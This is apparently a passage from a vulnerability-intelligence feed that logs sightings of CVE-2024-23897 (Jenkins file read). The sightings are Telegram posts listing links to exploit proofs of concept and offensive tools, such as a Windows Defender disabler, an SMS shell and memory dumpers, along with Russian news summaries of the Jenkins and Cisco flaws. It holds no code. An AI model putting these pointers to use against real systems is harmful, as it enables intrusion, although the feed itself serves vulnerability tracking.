available\n\nhttps://github.com/morRubin/NegoExRelay\n\nMinimal DNS server built in Rust with rule system and logging.\n\nhttps://github.com/sammwyy/mindns\n\nA repository of code signing certificates known to have been leaked or stolen, then abused by threat actors\n\nhttps://github.com/WithSecureLabs/lolcerts\n\nTo audit the security of read-only domain controllers\n\nhttps://github.com/wh0amitz/SharpRODC\n\nCVE-2024-23897\nJenkins CVE-2024-23897: Arbitrary File Read Vulnerability Leading to RCE\n\nhttps://github.com/h4x0r-dz/CVE-2024-23897\n\nCVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure\n\nhttps://github.com/h4x0r-dz/CVE-2024-21893.py\n\nHTTP Downgrade attacks with SmuggleFuzz\n\nhttps://moopinger.github.io/blog/smugglefuzz/fuzzing/smuggling/2024/01/31/SmuggleFuzz.html\n\nsmugglefuzz : A customizable and rapid HTTP downgrade smuggling scanner written in Go \n\nhttps://github.com/Moopinger/smugglefuzz\n\nRef : http2smugl : tool helps to detect and exploit HTTP request smuggling in cases it can be achieved via HTTP/2 -> HTTP/1.1 conversion by the frontend server\n\nhttps://github.com/neex/http2smugl\n\nAdvanced Time-based Blind SQL Injection fuzzer for HTTP Headers\n\nhttps://github.com/danialhalo/SqliSniper\n\n#HackersFactory", "creation_timestamp": "2024-02-18T11:26:18.000000Z"}, {"uuid": "0f6d7531-adb6-4637-9d87-143866b863ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/vqtjuMLGwB8CfMcT7xPtIvwg7iwQAPBQTP4IVPzRVFyy0jQ", "content": "", "creation_timestamp": "2025-04-04T17:00:08.000000Z"}, {"uuid": "61016128-702c-4fe7-9948-d7980afb78c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/UWcQRTLyNnbLIimUgspqi9VApbez8X0RE6Ho1-v9XBNUVo8", "content": "", "creation_timestamp": "2025-03-23T16:00:09.000000Z"}, {"uuid": "fcecf834-759d-48a1-9de5-df3c67fdc743", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/y5bPA9ph5O2OZ-0EMRz423WQ2VMHSmAey-ryYdo3glHmWGQ", "content": "", "creation_timestamp": "2024-07-24T05:38:35.000000Z"}, {"uuid": "27721a73-919a-4ca0-a84b-c47883c05491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3228", "content": "Tools - Hackers Factory \n\nPoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers\n\nhttps://github.com/persistent-security/SMShell\n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nNuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)\n\nhttps://github.com/kaanatmacaa/CVE-2024-23897\n\nCVE-2023-4427\n\nhttps://github.com/tianstcht/CVE-2023-4427\n\nDisable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)\n\nhttps://github.com/EvilGreys/Disable-Windows-Defender-\n\nA repo for TPM sniffing greatness\n\nhttps://github.com/NoobieDog/TPM-Sniffing\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nSecretPixel is a cutting-edge steganography tool designed to securely conceal sensitive information within images. It stands out in the realm of digital steganography by combining advanced encryption, compression, and a seeded Least Significant Bit (LSB) technique to provide a robust solution for embedding data undetectably.\n\nhttps://github.com/x011/SecretPixel\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nThe code that wasn\u2019t there: Reading memory on an Android device by accident\n\nhttps://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident/\n\n#HackersFactory", "creation_timestamp": "2024-02-28T03:46:02.000000Z"}, {"uuid": "464f35d7-c529-4ac4-83c0-d7b853dfc26f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/breachdetector/432796", "content": "{\n  \"Source\": \"https://exploit.in/\",\n  \"Content\": \"CVE-2024-23897: \u0437\u0430\u0445\u0432\u0430\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 Jenkins \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0434\u043d\u043e\u0433\u043e \u0441\u0438\u043c\u0432\u043e\u043b\u0430\", \n  \"author\": \"News Support\",\n  \"Detection Date\": \"31 Jan 2024\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2024-01-31T15:46:48.000000Z"}, {"uuid": "f645860c-dee6-4e5f-bb67-f840cf01e1ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/bjF9yK68rnx1LCq0pTnFw0xevZv_TMwH53swCgNMEKTKB5Q", "content": "", "creation_timestamp": "2024-03-18T06:32:07.000000Z"}, {"uuid": "03d4ebd8-ab08-4963-9aaf-3f6875b50435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/6627", "content": "Tools - Hackers Factory \n\nPoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers\n\nhttps://github.com/persistent-security/SMShell\n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nNuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)\n\nhttps://github.com/kaanatmacaa/CVE-2024-23897\n\nCVE-2023-4427\n\nhttps://github.com/tianstcht/CVE-2023-4427\n\nDisable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)\n\nhttps://github.com/EvilGreys/Disable-Windows-Defender-\n\nA repo for TPM sniffing greatness\n\nhttps://github.com/NoobieDog/TPM-Sniffing\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nSecretPixel is a cutting-edge steganography tool designed to securely conceal sensitive information within images. It stands out in the realm of digital steganography by combining advanced encryption, compression, and a seeded Least Significant Bit (LSB) technique to provide a robust solution for embedding data undetectably.\n\nhttps://github.com/x011/SecretPixel\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nThe code that wasn\u2019t there: Reading memory on an Android device by accident\n\nhttps://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident/\n\n#HackersFactory", "creation_timestamp": "2024-02-12T11:50:19.000000Z"}, {"uuid": "0e2118e7-b9c3-4f56-9b12-2c6c45dbd897", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/breachdetector/492168", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2024-23897 Jenkins Args4j Nedir ? (Anlat\u0131m Konusu)\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"10 Apr 2024\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2024-04-10T10:28:24.000000Z"}, {"uuid": "05a8485b-8f91-46dc-8107-15e176093629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1444", "content": "CVE-2024-23897: Jenkins RCE\n\nhttps://github.com/binganao/CVE-2024-23897\n\n#exploit #git", "creation_timestamp": "2024-01-26T10:42:05.000000Z"}, {"uuid": "42fbc49a-c1ea-4e12-921e-6a5054c29b5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/54jKggmH4iU6ZYl__jRAhcj6ENRZ4ozx07xB2nikgMzndIM", "content": "", "creation_timestamp": "2024-02-01T08:16:12.000000Z"}, {"uuid": "3b7f0e83-bbf2-4c6f-b2d1-0143f1a3bbc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/5346", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Jenkins RCE \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c\u0438, \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u0420\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 SonarSource, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b CLI \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445.\n\n\u041f\u0435\u0440\u0432\u0430\u044f CVE-2024-23897 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u00ab\u043e\u0431\u0449\u0435\u0435/\u0447\u0442\u0435\u043d\u0438\u0435\u00bb \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Jenkins.\n\n\u041f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043e\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2024-23898 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 WebSocket, \u043f\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b CLI, \u043e\u0431\u043c\u0430\u043d\u043d\u044b\u043c \u043f\u0443\u0442\u0435\u043c \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0449\u0435\u043b\u043a\u043d\u0443\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443.\n\nSonarSource \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0430 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0430\u0445 \u043a\u043e\u043c\u0430\u043d\u0434\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Jenkins 13 \u043d\u043e\u044f\u0431\u0440\u044f 2023, \u0430 24 \u044f\u043d\u0432\u0430\u0440\u044f \u0431\u044b\u043b\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 2.442 \u0438 LTS 2.426.3 \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u043c\u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f\u043c\u0438.\n\n\u0420\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u044f \u043e\u0431\u0448\u0438\u0440\u043d\u043e\u0439 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043f\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c \u0432 Jenkins, \u043c\u043d\u043e\u0433\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0432 GitHub \u0440\u0430\u0431\u043e\u0447\u0438\u0435 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b, \u043f\u0440\u0435\u0436\u0434\u0435 \u0432\u0441\u0435\u0433\u043e, \u0434\u043b\u044f CVE-2024-23897.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u043c\u043d\u043e\u0433\u0438\u0435 \u0438\u0437 \u044d\u0442\u0438\u0445 PoC \u0443\u0436\u0435\u00a0\u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u044b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0449\u0438\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043d\u0435 \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u0443\u0441\u0438\u043b\u0438\u0439 \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f \u0430\u0442\u0430\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0436\u0435 \u0432\u043e\u0432\u0441\u044e \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442\u0441\u044f.", "creation_timestamp": "2024-01-29T12:46:44.000000Z"}, {"uuid": "54073fb5-6308-4700-953a-7b8d8114044c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/true_secator/5339", "content": "\u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0443\u0440\u043e\u0436\u0430\u0439\u043d\u043e\u0439 \u0432\u044b\u0434\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0434\u0435\u043b\u044c\u043a\u0430 \u043f\u043e \u0447\u0430\u0441\u0442\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432\u0441\u043b\u0435\u0434 \u0437\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 Ivanti, Juniper, Chrome, Citrix, VMware \u0438 Atlassian.\n\nCisco \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0435\u0439 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u0435\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Unified Communications Manager (CM) \u0438 Contact Center Solutions, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0438\u043c\u0438 \u0443\u0441\u043b\u0443\u0433\u0438 \u0433\u043e\u043b\u043e\u0441\u043e\u0432\u043e\u0439 \u0441\u0432\u044f\u0437\u0438, \u0432\u0438\u0434\u0435\u043e \u0438 \u043e\u0431\u043c\u0435\u043d\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u0441 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c\u0438.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-20253 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435.\n\n\u041e\u043d\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 Synacktiv \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 9,9 \u0438\u0437 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0445 10.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0435\u0439, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u044e\u0449\u0438\u0439 \u043f\u043e\u0440\u0442, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c root-\u0434\u043e\u0441\u0442\u0443\u043f.\n\n\u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u0437\u0430\u044f\u0432\u043b\u044f\u0435\u0442, \u0447\u0442\u043e \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 \u043d\u0435\u0442, \u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\nCisco \u0441\u043e\u0432\u0435\u0442\u0443\u0435\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c ACL \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0438 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435, \u043a\u043e\u0433\u0434\u0430 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e.\n\n\u041f\u043e\u043a\u0430 \u0447\u0442\u043e \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u0443 \u043d\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043e \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0445 \u043e\u0431\u044a\u044f\u0432\u043b\u0435\u043d\u0438\u044f\u0445 \u0438\u043b\u0438 \u0437\u043b\u043e\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041d\u043e \u044d\u0442\u043e \u043f\u043e\u043a\u0430.\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Jenkins \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0438 \u0434\u0435\u0432\u044f\u0442\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443 \u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 9,8/10, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a RCE.\n\nCVE-2024-23897 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0447\u0442\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0447\u0435\u0440\u0435\u0437 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 CLI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 args4j \u0434\u043b\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043a\u043e\u043c\u0430\u043d\u0434. \n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u044f\u0442\u044c \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u0447\u0442\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 